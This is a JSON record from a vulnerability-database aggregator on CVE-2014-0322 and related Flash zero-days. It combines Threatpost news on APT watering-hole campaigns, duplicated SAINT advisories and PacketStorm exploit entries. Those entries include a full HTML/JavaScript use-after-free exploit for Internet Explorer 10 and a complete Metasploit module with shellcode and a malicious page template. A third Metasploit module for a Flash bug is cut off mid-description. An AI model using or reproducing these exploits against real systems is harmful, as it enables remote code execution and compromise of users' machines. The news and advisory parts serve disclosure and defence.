"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:21", "bulletinFamily": "info", "cvelist": ["CVE-2014-0322", "CVE-2017-11882"], "description": "Microsoft last night released a [Fix-It tool](<http://blogs.technet.com/b/srd/archive/2014/02/19/fix-it-tool-available-to-block-internet-explorer-attacks-leveraging-cve-2014-0322.aspx>) as a temporary mitigation for a zero-day vulnerability in Internet Explorer 10 being exploited by two hacker groups against the Veterans of Foreign Wars in the U.S. as well as a [French aerospace manufacturer](<http://threatpost.com/second-group-seen-using-ie-10-zero-day/104344>).\n\nIE 9 also contains the same use-after free vulnerability enabling remote code execution, but it is not being exploited, Microsoft said. Microsoft has issued Fix-It tools for a number of zero-day vulnerabilities exploited in the wild in lieu of rushing out an out-of-band patch. The company\u2019s next scheduled Patch Tuesday security updates release is March 11, which is likely the earliest an IE update would be released.\n\nMicrosoft has been patching its maligned browser almost monthly for more than a year, including a [cumulative update](<http://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214>) on Feb. 11 that patched 24 vulnerabilities, including one that was publicly disclosed.\n\nResearchers at FireEye reported the Veterans of Foreign Wars attack last week and attributed [Operation SnowMan](<http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>) to the same groups behind DeputyDog and Ephemeral Hydra, both of which exploited IE zero-days in watering hole attacks to distribute remote access Trojans in order to spy on targets in government, military, manufacturing and other high value industries.\n\nFireEye found an iframe on VFW.org that used a malicious Flash object to trigger the vulnerability in IE 10. Once on a compromised machine the Flash object downloads the RAT from a command server and executes it. As in the previous attacks, a variant of Gh0stRAT, was used in the SnowMan attacks and connected to some of the same IP addresses. The exploit used in the SnowMan attacks, FireEye said, can bypass memory protection features such as Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) built into Windows.\n\nYesterday, researchers at Seculert reported that a second group of attackers was using the same vulnerability in the Microsoft browser to impersonate the French aerospace firm and compromise visitors to its website and steal credentials. [Reuters](<http://www.reuters.com/article/2014/02/18/us-hacking-snecma-idUSBREA1H1Z320140218>) reported yesterday that the manufacturer was Snecma, an engine manufacturer. The news agency cited a source who said the malware used against Snecma targeted domains belonging to the company.\n\nMicrosoft confirmed FireEye\u2019s finding in a [technical description](<http://technet.microsoft.com/en-us/security/advisory/2934088>) of the vulnerability yesterday:\n\n\u201cTo recap, it uses Javascript to trigger the use-after-free condition and then uses Flash to convert a write primitive into a read/write primitive that enables DEP and ASLR to be bypassed. The primitive conversion happens by redirecting a write based on a freed object\u2019s data (which has now been reallocated by the attacker) to corrupt a size field inside a Flash object. The corrupted size field in the Flash object is used to read and write outside of the object\u2019s boundary, allowing discovery of module addresses in Internet Explorer\u2019s Address Space.\u201d\n\nSeculert CTO Aviv Raff said the second group is likely not affiliated with the Operation SnowMan gang. While exploiting the same vulnerability, the group targeting the French manufacturer used different malware. It drops a backdoor and two executables that steal information from browsing sessions; that data is sent to a command and control server, which is hosted in the U.S. Raff said the malware is signed with a valid certificate belonging to Micro Digital Inc.\n\nThe malware changes the host files on infected machines and adds several secure domains for French aerospace companies. While some pharming campaigns have gone this route, Raff said this campaign has a different goal.\n\n\u201cThe domains that were added to the hosts file by the malware provide remote access to the employees, partners, and 3rd party vendors of a specific multinational aircraft and rocket engine manufacturer,\u201d Raff said. \u201cThe IPs added belong to the real remote access web servers and by adding the records to the hosts file the attackers ensured that there would be no DNS connectivity issues. Whenever the infected machines connect to the remote assets, the attackers are able to steal the sensitive credentials. This is the first time we have seen a malware change a hosts file for a purpose other than fraud perpetuated by pharming or for disabling access to specific websites.\u201d\n", "modified": "2014-02-20T16:48:48", "published": "2014-02-20T11:48:48", "id": "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "href": "https://threatpost.com/microsoft-ships-fix-it-for-ie-10-zero-day/104383/", "type": "threatpost", "title": "Microsoft Ships IE 10 Zero Day Fix-It Tool", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:34", "bulletinFamily": "info", "cvelist": ["CVE-2015-2424", "CVE-2015-5119"], "description": "An APT group thought to be tied to Russia is flying against conventional wisdom, having as recently as the last three weeks dropped its sixth zero-day in the past four months.\n\nGiven the underground value of unpatched and unreported vulnerabilities, this is highly unusual behavior, even for a state-sponsored cyberespionage team.\n\nNonetheless, [APT 28](<https://threatpost.com/russian-apt28-group-linked-to-nato-political-attacks/109049>), also known by other nicknames such as Tsar Team, Operation Pawn Storm, and Sednit, has been a busy gang targeting government agencies and military operations with a host of Adobe Flash, Microsoft and Java-based zero-days at their disposal.\n\nThis week alone, two zero-days attributed to this team disappeared when they were [patched by Microsoft](<https://threatpost.com/microsoft-patches-hacking-team-windows-kernel-zero-day/113788>) and Oracle in Office and Java respectively. Researchers at [iSight Partners](<http://www.isightpartners.com/2015/07/microsoft-office-zero-day-cve-2015-2424-leveraged-by-tsar-team/>) reported the Office zero-day to Microsoft on June 30 and it was patched on Tuesday in [MS15-070](<https://technet.microsoft.com/en-us/library/security/MS15-070>), an Office security bulletin that patched 13 other vulnerabilities in the software. Later that night, [Oracle erased a Java zero-day](<https://threatpost.com/oracle-patches-java-zero-day/113792>) in its quarterly Critical Patch Update that was used against a U.S.-based defense contractor and foreign military outfits. It was the first Java zero day actively exploited in the wild since 2013, experts said.\n\nAPT 28 keeps a vast arsenal of malware and domains under its control, according to researchers Brian Bartholomew and Jonathan Leathery of iSight.\n\n\u201cThis indicates it\u2019s not a handful of guys; this is an organization managing this stuff,\u201d Bartholomew said, adding that the group has also been known to use cryptocurrency such as Bitcoin to buy domains in order to hide registration information and remain anonymous. \u201cIt\u2019s hard to manage that much infrastructure that they own.\u201d\n\nFive of the half-dozen zero days, Bartholomew said, were built in-house by APT 28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was uncovered after the Hacking Team breach.\n\n\u201cThey actually rewrote it, which is interesting. It\u2019s not just a copy of the [Hacking Team] proof of concept with their own shell code added,\u201d Bartholomew said.\n\nThe Office zero day, CVE-2015-2424, was likely still under development since iSight researchers said it was still fairly buggy and unreliable. It was likely spread via spear phishing emails, specifically targeting individuals or groups within sensitive organizations. The lure found by iSight was a Word document purporting to be an analysis of the Iran nuclear deal.\n\n\u201cIt\u2019s a heap corruption vulnerability in Office where it\u2019s mishandling an object in memory, which allowed for remote code execution from the weaponized document,\u201d Leathery said, adding that the message also included a CNN article on the Iran deal published June 28. The likely targets were the former Soviet republic of Georgia.\n\nThe payload is a variant of the Sofacy or Sednit Trojan, which immediately opens a backdoor to a number of attacker-controlled domains where stolen data is sent. Some of the domains, iSight said, are benign or do not belong to the APT group, a false-flag of sorts. The targets are government agencies in Eastern Europe or NATO, along with critical industries such as nuclear, telecommunications, defense industrial base and diplomatic interests.\n\nThe group is not only adept at gathering intelligence from foreign interests, but also focuses on internal dissidents and threats to national security in Russia, iSight said. One counter-terrorism operation attributed to this group is the so-called Cyber Caliphate hacktivist operation, where hackers posing as ISIS supporters set up lures via social media or forums trying to attract those sympathetic to the Islamic State. Once some confidence is established with a target via direct messaging, APT 28 would entice them to install an application that was malicious and allowed them to monitor the dissidents\u2019 activities.\n\nDespite the fact that this particular Office\u2014and Java\u2014zero day has been patched, iSight believes APT 28 is well resourced and has more at its disposal.\n\n\u201cThis throws a wrench in their plans; usually they can get a few months out of a zero day before a patch is out,\u201d Bartholomew said. \u201cIt\u2019s unprecedented using this many zero days, but at the same time, they have access to developers who can build these or have the resources to buy them.\u201d\n", "modified": "2015-07-21T20:45:15", "published": "2015-07-16T13:46:02", "id": "THREATPOST:644EA98A53DF0E53AF5BDAC1607B06D2", "href": "https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825/", "type": "threatpost", "title": "Office, Java Patches Erase Latest APT 28 Zero Days", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:34", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "description": "Adobe has put the two outstanding [Hacking Team Flash Player zero-day vulnerabilities](<https://threatpost.com/hacking-team-promises-to-rebuild-controversial-surveillance-software/113743>) in check.\n\nToday, Adobe released an [updated Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb15-18.html>) that patches CVE-2015-5122 and CVE-2015-5123, two use-after-free bugs uncovered and exploited by the controversial Italian surveillance software vendor. The bugs were found as researchers combed through the 400 Gb of data stolen from Hacking Team and posted online July 5.\n\nSince the disclosures, three Flash zero days and an unpatched, publicly exploited Windows kernel privilege escalation vulnerability have been emerged from the Hacking Team cache. Adobe has already [patched the first Flash zero day](<https://threatpost.com/adobe-to-patch-hacking-team-zero-day-in-flash/113658>), CVE-2015-5119, and it is unknown whether Microsoft will today patch the Windows 0day as part of its monthly Patch Tuesday security bulletins.\n\nThe Adobe patches come less than 24 hours after browser vendor Mozilla announced that it had [disabled Flash by default in Firefox](<https://threatpost.com/mozilla-disables-flash-in-firefox/113763>). Prominent security figures, such as new Facebook CSO Alex Stamos, have been vocal about Adobe killing off Flash entirely. Flash has long been a favorite target of criminal and nation-state hackers for its cross-platform ubiquity, and constant spate of security vulnerabilities.\n\n[CVE-2015-5122](<http://www.kb.cert.org/vuls/id/338736>), disclosed to Adobe by FireEye, is an [ActionScript 3 opaqueBackground use-after-free bug](<https://www.fireeye.com/blog/threat-research/2015/07/cve-2015-5122_-_seco.html>), while [CVE-2015-5123](<http://www.kb.cert.org/vuls/id/918568>) is a BitmapData use-after free bug. According to the DHS CERT, both bugs can be exploited by an attacker tricking a visitor into landing on a website hosting an exploit, and allow for complete takeover of a compromised machine\n\nExploit kit expert and security researcher [Kafeine](<http://malware.dontneedcoffee.com/2015/07/cve-2015-5122-hackingteam-0d-two-flash.html>) said the zero day discovered by FireEye has already been integrated into the Angler Exploit Kit, as well as the Metasploit Framework. The first zero-day uncovered in the hack was also quickly [incorporated into popular exploit kits](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663>).\n\nToday\u2019s Flash update, 18.0.0.209, patches versions 18.0.0.203 and earlier for Windows and Macintosh systems, and 18.0.0.204 and earlier for Linux machines.\n\nThe Hacking Team hack was disclosed on July 5 when seemingly all of the company\u2019s internal email, product specs and sales data was posted at numerous sites. Despite company policy stating the contrary, invoices and sales receipts found in the post-breach data dump show that Hacking Team sold its Remote Control System (RCS) tool to sanctioned countries run by oppressive governments, such as Sudan and Ethiopia. Hacking Team said it has ended its business relationships with these countries. RCS is sold to law enforcements and government agencies worldwide as a monitoring tool.\n\nYesterday, Hacking Team renewed its vow to press on as a company and rebuild not only its infrastructure, but RCS from scratch.\n\n\u201cA totally new internal infrastructure is being [built] at this moment to keep our data safe. Of course, our top priority here has been to develop an update to allow our clients to quickly secure their current surveillance infrastructure,\u201d said Hacking Team chief operating officer David Vincenzetti in a statement. \u201cWe expect to deliver this update immediately. This update will secure once again the \u2018Galileo\u2019 version of Remote Control System.\u201d\n\nAdobe today also patched [46 vulnerabilities in Adobe Reader and Acrobat](<https://helpx.adobe.com/security/products/acrobat/apsb15-15.html>), and [two in the Shockwave Player](<https://helpx.adobe.com/security/products/shockwave/apsb15-17.html>).\n\nThe Reader and Acrobat updates patch a number of code execution vulnerabilities, in addition to information disclosure, denial-of-service, and privilege escalation vulnerabilities in versions 11.0.11 and 10.1.14 and earlier for Windows and Macintosh machines.\n\nThe Shockwave update addresses two memory corruption bugs that lead to code execution in versions 12.1.8.158 and earlier, Adobe said.\n", "modified": "2015-07-15T14:15:04", "published": "2015-07-14T11:47:14", "id": "THREATPOST:521E37B95AC41E0A1D35ADB09B1A4835", "href": "https://threatpost.com/flash-player-update-patches-two-hacking-team-zero-days/113776/", "type": "threatpost", "title": "Adobe Patches Hacking Team Zero Days in Flash", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:32", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "description": "Yet another group of attackers has quickly cashed in on one of the Adobe Flash zero days uncovered in the HackingTeam leak and is leveraging it to target Japanese organizations.\n\nLast week researchers determined that attackers were able to compromise two Japanese websites, the country\u2019s International Hospitality and Conference Service Association (IHCSA) and Cosmetech, Inc. to exploit CVE-2015-5122, one of two Flash zero day vulnerabilities Adobe patched last Tuesday.\n\nThe group is hosting their infrastructure between the two Japanese sites, via a strategic web compromise, which has led researchers to believe the attackers are targeting organizations in Japan.\n\n[According to FireEye](<https://threatpost.com/apt-group-exploiting-hacking-team-flash-zero-day/113715>), who discovered the attacks and claims its observed at least two victims so far, the exploit is a two-step process: Users who visit a particular URL on the IHCSA\u2019s site are redirected to the HackingTeam Adobe Flash framework on Cosmetech\u2019s website. From there, assuming the user is running an old version of Flash, the site drops a malicious .SWF file, which in turn, drops a relatively new strain of malware, SOGU.\n\nWhile the malware \u2013 which also goes by the nickname Kaba \u2013 is a backdoor widely used by Chinese threat groups, researchers couldn\u2019t directly connect any specific Chinese APT group to the campaign outright.\n\nFireEye couldn\u2019t confirm how organizations were targeted but suggests that since other, similar APT groups that have used Hacking Team Flash zero days this month have done so via spearphishing, victims from this campaign may have also been lured with phishing emails.\n\nIt\u2019s been a rocky summer for Adobe; it was about [a week ago](<https://threatpost.com/flash-player-update-patches-two-hacking-team-zero-days/113776>) that the company rushed out a new version of Flash that addressed both CVE-2015-5122, first disclosed to Adobe by FireEye, along with another that surfaced in the [HackingTeam breach](<https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612>) earlier this month, CVE-2015-5123.\n\nThe new group is one of several in the wake of the HackingTeam breach to incorporate an Adobe zero day into their campaign.\n\nJust days after the breach came to light, attackers with both [APT 18 and APT 3](<https://threatpost.com/apt-group-exploiting-hacking-team-flash-zero-day/113715>) began using CVE-2015-5119, the first Flash vulnerability that emerged, to carry out phishing attacks against a slew of organizations. Adobe addressed that vulnerability, along with 46 other bugs in Reader, Acrobat and Shockwave, with a security update [the week before last](<https://threatpost.com/adobe-to-patch-hacking-team-zero-day-in-flash/113658>).\n", "modified": "2015-07-22T19:23:50", "published": "2015-07-20T11:27:15", "id": "THREATPOST:30E23091BD920CFE6F579C918001D85D", "href": "https://threatpost.com/new-campaign-targeting-japanese-with-hackingteam-zero-day/113848/", "type": "threatpost", "title": "New Campaign Targeting Japanese with Hacking Team Zero Day", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "description": "Added: 04/17/2014 \nCVE: [CVE-2014-0322](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0322>) \nBID: [65551](<http://www.securityfocus.com/bid/65551>) \nOSVDB: [103354](<http://www.osvdb.org/103354>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 9 and 10 contain a use-after-free vulnerability in the `CMarkup` component of the `MSHTML` library. By enticing a user to open a specially crafted web page, a remote attacker could upload and execute arbitrary code on the compromised user's system. \n\nThis exploit in the wild uses the Internet Explorer vulnerability to corrupt Adobe Flash content in such a way as to bypass Address Space Layout Randomization (ASLR), disable Data Execution Prevention (DEP), and then execute code. \n\n### Resolution\n\nApply updates as specified in Microsoft Security Bulletin [MS14-012](<https://technet.microsoft.com/library/security/ms14-012>). \n\n### References\n\n<http://secunia.com/advisories/56974/> \n<http://www.kb.cert.org/vuls/id/732479> \n\n\n### Limitations\n\nThe user must open the exploit page in MS IE 9 or 10. \n\nExploit was tested using Adobe Flash Player 12.0.0.70 and 12.0.0.77. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2014-04-17T00:00:00", "published": "2014-04-17T00:00:00", "id": "SAINT:6D3D943FE6C76C9CA78A9454A6931B44", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_cmarkup_uaf", "title": "Internet Explorer CMarkup Object Handling Use-after-free Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:24", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "edition": 2, "description": "Added: 04/17/2014 \nCVE: [CVE-2014-0322](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0322>) \nBID: [65551](<http://www.securityfocus.com/bid/65551>) \nOSVDB: [103354](<http://www.osvdb.org/103354>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 9 and 10 contain a use-after-free vulnerability in the `CMarkup` component of the `MSHTML` library. By enticing a user to open a specially crafted web page, a remote attacker could upload and execute arbitrary code on the compromised user's system. \n\nThis exploit in the wild uses the Internet Explorer vulnerability to corrupt Adobe Flash content in such a way as to bypass Address Space Layout Randomization (ASLR), disable Data Execution Prevention (DEP), and then execute code. \n\n### Resolution\n\nApply updates as specified in Microsoft Security Bulletin [MS14-012](<https://technet.microsoft.com/library/security/ms14-012>). \n\n### References\n\n<http://secunia.com/advisories/56974/> \n<http://www.kb.cert.org/vuls/id/732479> \n\n\n### Limitations\n\nThe user must open the exploit page in MS IE 9 or 10. \n\nExploit was tested using Adobe Flash Player 12.0.0.70 and 12.0.0.77. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2014-04-17T00:00:00", "published": "2014-04-17T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_cmarkup_uaf", "id": "SAINT:D8D6BCBC7A7819EE47BC5E6D40059708", "title": "Internet Explorer CMarkup Object Handling Use-after-free Vulnerability", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "description": "Added: 04/17/2014 \nCVE: [CVE-2014-0322](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0322>) \nBID: [65551](<http://www.securityfocus.com/bid/65551>) \nOSVDB: [103354](<http://www.osvdb.org/103354>) \n\n\n### Background\n\n[Internet Explorer](<http://www.microsoft.com/windows/ie>) is an HTML web browser which comes by default on Microsoft operating systems. \n\n### Problem\n\nMicrosoft Internet Explorer 9 and 10 contain a use-after-free vulnerability in the `CMarkup` component of the `MSHTML` library. By enticing a user to open a specially crafted web page, a remote attacker could upload and execute arbitrary code on the compromised user's system. \n\nThis exploit in the wild uses the Internet Explorer vulnerability to corrupt Adobe Flash content in such a way as to bypass Address Space Layout Randomization (ASLR), disable Data Execution Prevention (DEP), and then execute code. \n\n### Resolution\n\nApply updates as specified in Microsoft Security Bulletin [MS14-012](<https://technet.microsoft.com/library/security/ms14-012>). \n\n### References\n\n<http://secunia.com/advisories/56974/> \n<http://www.kb.cert.org/vuls/id/732479> \n\n\n### Limitations\n\nThe user must open the exploit page in MS IE 9 or 10. \n\nExploit was tested using Adobe Flash Player 12.0.0.70 and 12.0.0.77. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2014-04-17T00:00:00", "published": "2014-04-17T00:00:00", "id": "SAINT:4AA18219F0F43605A5B96CC5B2DF62FF", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ie_cmarkup_uaf", "type": "saint", "title": "Internet Explorer CMarkup Object Handling Use-after-free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:27", "description": "", "published": "2014-04-14T00:00:00", "type": "packetstorm", "title": "MS14-012 Internet Explorer CMarkup Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2014-04-14T00:00:00", "id": "PACKETSTORM:126150", "href": "https://packetstormsecurity.com/files/126150/MS14-012-Internet-Explorer-CMarkup-Use-After-Free.html", "sourceData": "`<!-- \nMS14-012 Internet Explorer CMarkup Use-After-Free \nVendor Homepage: http://www.microsoft.com \nVersion: IE 10 \nDate: 2014-03-31 \nExploit Author: Jean-Jamil Khalife \nTested on: Windows 7 SP1 x64 (fr, en) \nFlash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77) \nHome: http://www.hdwsec.fr \nBlog : http://www.hdwsec.fr/blog/ \nMS14-012 / CVE-2014-0322 \n \nGeneration: \nc:\\mxmlc\\bin>mxmlc.exe AsXploit.as -o AsXploit.swf \n \nE-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as \n \n--> \n \n<html> \n<head> \n</head> \n<body> \n \n<script> \n \nvar g_arr = []; \nvar arrLen = 0x250; \n \nfunction dword2data(dword) \n{ \nvar d = Number(dword).toString(16); \nwhile (d.length < 8) \nd = '0' + d; \n \nreturn unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4)); \n} \n \nfunction eXpl() \n{ \nvar a=0; \n \nfor (a=0; a < arrLen; a++) { \ng_arr[a] = document.createElement('div'); \n} \n \n// Build a new object \nvar b = dword2data(0x19fffff3); \nwhile (b.length < 0x360) \n{ \n// mov eax,dword ptr [esi+98h] \n// ... \n// mov eax,dword ptr [eax+8] \n// and dword ptr [eax+2F0h],0FFFFFFBFh \nif (b.length == (0x98 / 2)) \n{ \nb += dword2data(0x1a000010); \n} \n// mov ecx,dword ptr [edx+94h] \n// mov eax,dword ptr [ecx+0Ch] \nelse if (b.length == (0x94 / 2)) \n{ \nb += dword2data(0x1a111111); \n} \n// mov eax,dword ptr [edx+15Ch] \n// mov ecx,dword ptr [eax+edx*8] \nelse if (b.length == (0x15c / 2)) \n{ \nb += dword2data(0x42424242); \n} \nelse \n{ \nb += dword2data(0x19fffff3); \n} \n} \n \nvar d = b.substring(0, ( 0x340 - 2 )/2); \n \n// trigger \ntry{ \nthis.outerHTML=this.outerHTML \n} \ncatch(e){ \n \n} \n \nCollectGarbage(); \n \n// Replace freed object \nfor (a=0; a < arrLen; a++) \n{ \ng_arr[a].title = d.substring(0, d.length); \n} \n} \n \n// Trigger the vulnerability \nfunction trigger() \n{ \nvar a = document.getElementsByTagName(\"script\"); \nvar b = a[0]; \nb.onpropertychange = eXpl; \nvar c = document.createElement('SELECT'); \nc = b.appendChild(c); \n} \n \n \n \n</script> \n<embed src=AsXploit.swf width=\"10\" height=\"10\"></embed> \n</body> \n</html> \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126150/msiecmarkup-uaf.txt"}, {"lastseen": "2016-12-05T22:23:04", "description": "", "published": "2014-04-16T00:00:00", "type": "packetstorm", "title": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0322"], "modified": "2014-04-16T00:00:00", "id": "PACKETSTORM:126178", "href": "https://packetstormsecurity.com/files/126178/MS14-012-Microsoft-Internet-Explorer-CMarkup-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free\", \n'Description' => %q{ \nThis module exploits an use after free condition on Internet Explorer as used in the wild \non the \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to \nbypass ASLR and finally DEP. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Vulnerability discovery and Exploit in the wild \n'Jean-Jamil Khalife', # Exploit \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2014-0322' ], \n[ 'MSB', 'MS14-012' ], \n[ 'BID', '65551' ], \n[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'], \n[ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ] \n], \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n'Payload' => \n{ \n'Space' => 960, \n'DisableNops' => true, \n'PrependEncoder' => stack_adjust \n}, \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => Msf::OperatingSystems::WINDOWS, \n:os_flavor => Msf::OperatingSystems::WindowsVersions::SEVEN, \n:ua_name => Msf::HttpClients::IE, \n:ua_ver => '10.0', \n:mshtml_build => lambda { |ver| ver.to_i < 16843 }, \n:flash => /^12\\./ \n}, \n'DefaultOptions' => \n{ \n'InitialAutoRunScript' => 'migrate -f', \n'Retries' => false \n}, \n'Targets' => \n[ \n[ 'Windows 7 SP1 / IE 10 / FP 12', { } ], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Feb 13 2014\", \n'DefaultTarget' => 0)) \n \nend \n \ndef stack_adjust \nadjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb \nadjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit \nadjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit \nadjust << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset \n \nadjust \nend \n \ndef create_swf \npath = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0322\", \"AsXploit.swf\" ) \nfd = ::File.open( path, \"rb\" ) \nswf = fd.read(fd.stat.size) \nfd.close \nreturn swf \nend \n \ndef exploit \n@swf = create_swf \nsuper \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status(\"Sending SWF...\") \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Sending HTML...\") \nsend_exploit_html(cli, exploit_template(cli, target_info)) \nend \n \ndef exploit_template(cli, target_info) \n \nflash_payload = \"\" \nget_payload(cli,target_info).unpack(\"V*\").each do |i| \nflash_payload << \"0x#{i.to_s(16)},\" \nend \nflash_payload.gsub!(/,$/, \"\") \n \nhtml_template = %Q| \n<html> \n<head> \n</head> \n<body> \n \n<script> \n \nvar g_arr = []; \nvar arrLen = 0x250; \n \nfunction dword2data(dword) \n{ \nvar d = Number(dword).toString(16); \nwhile (d.length < 8) \nd = '0' + d; \n \nreturn unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4)); \n} \n \nfunction eXpl() \n{ \nvar a=0; \n \nfor (a=0; a < arrLen; a++) { \ng_arr[a] = document.createElement('div'); \n} \n \nvar b = dword2data(0x19fffff3); \n \nwhile (b.length < 0x360) { \nif (b.length == (0x98 / 2)) \n{ \nb += dword2data(0x1a000010); \n} \nelse if (b.length == (0x94 / 2)) \n{ \nb += dword2data(0x1a111111); \n} \nelse if (b.length == (0x15c / 2)) \n{ \nb += dword2data(0x42424242); \n} \nelse \n{ \nb += dword2data(0x19fffff3); \n} \n} \n \nvar d = b.substring(0, ( 0x340 - 2 )/2); \n \ntry{ \nthis.outerHTML=this.outerHTML \n} catch(e){ \n \n} \n \nCollectGarbage(); \n \nfor (a=0; a < arrLen; a++) \n{ \ng_arr[a].title = d.substring(0, d.length); \n} \n} \n \nfunction trigger() \n{ \nvar a = document.getElementsByTagName(\"script\"); \nvar b = a[0]; \nb.onpropertychange = eXpl; \nvar c = document.createElement('SELECT'); \nc = b.appendChild(c); \n} \n \n</script> \n<embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars=\"version=<%=flash_payload%>\" width=\"10\" height=\"10\"> \n</embed> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126178/ms14_012_cmarkup_uaf.rb.txt"}, {"lastseen": "2016-12-05T22:11:30", "description": "", "published": "2015-07-08T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player ByteArray Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "PACKETSTORM:132600", "href": "https://packetstormsecurity.com/files/132600/Adobe-Flash-Player-ByteArray-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player ByteArray Use After Free', \n'Description' => %q{ \nThis module exploits an use after free on Adobe Flash Player. The vulnerability, \ndiscovered by Hacking Team and made 